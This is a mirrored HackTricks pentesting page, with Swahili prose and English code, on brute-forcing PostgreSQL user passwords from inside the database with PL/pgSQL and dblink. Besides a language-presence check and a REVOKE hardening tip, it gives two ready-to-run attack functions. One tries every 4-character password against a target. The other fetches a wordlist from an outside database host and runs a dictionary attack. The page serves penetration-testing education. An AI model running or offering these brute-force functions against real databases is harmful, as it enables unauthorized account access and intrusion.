maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md

3.2 KiB
Raw Blame History

PL/pgSQL Password Bruteforce

{{#include ../../../banners/hacktricks-training.md}}

Find more information about these attack in the original paper.

PL/pgSQL ni lugha ya programu yenye vipengele vyote ambayo inapanua uwezo wa SQL kwa kutoa udhibiti wa taratibu ulioimarishwa. Hii inajumuisha matumizi ya mizunguko na muundo mbalimbali wa udhibiti. Kazi zilizoundwa katika lugha ya PL/pgSQL zinaweza kuitwa na taarifa za SQL na vichocheo, na kupanua wigo wa operesheni ndani ya mazingira ya hifadhidata.

Unaweza kuitumia lugha hii ili kumuuliza PostgreSQL kujaribu nguvu akidi za watumiaji, lakini lazima iwepo kwenye hifadhidata. Unaweza kuthibitisha uwepo wake kwa kutumia:

SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+---------
plpgsql |

Kwa default, kuunda kazi ni haki inayotolewa kwa PUBLIC, ambapo PUBLIC inamaanisha kila mtumiaji kwenye mfumo huo wa database. Ili kuzuia hili, msimamizi angeweza kufuta haki ya USAGE kutoka kwa eneo la PUBLIC:

REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;

Katika kesi hiyo, ombi letu la awali lingetoa matokeo tofauti:

SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+-----------------
plpgsql | {admin=U/admin}

Kumbuka kwamba ili script ifanye kazi kazi dblink inahitaji kuwepo. Ikiwa haipo unaweza kujaribu kuunda hiyo na

CREATE EXTENSION dblink;

Password Brute Force

Hapa kuna jinsi unavyoweza kufanya brute force ya nywila ya herufi 4:

//Create the brute-force function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
DECLARE
word TEXT;
BEGIN
FOR a IN 65..122 LOOP
FOR b IN 65..122 LOOP
FOR c IN 65..122 LOOP
FOR d IN 65..122 LOOP
BEGIN
word := chr(a) || chr(b) || chr(c) || chr(d);
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;
EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection
THEN
-- do nothing
END;
END LOOP;
END LOOP;
END LOOP;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql';

//Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');

Note kwamba hata kujaribu nguvu za kikatili herufi 4 kunaweza kuchukua dakika kadhaa.

Unaweza pia kupakua orodha ya maneno na kujaribu tu nywila hizo (shambulio la kamusi):

//Create the function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
BEGIN
FOR word IN (SELECT word FROM dblink('host=1.2.3.4
user=name
password=qwerty
dbname=wordlists',
'SELECT word FROM wordlist')
RETURNS (word TEXT)) LOOP
BEGIN
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;

EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection THEN
-- do nothing
END;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql'

-- Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');

{{#include ../../../banners/hacktricks-training.md}}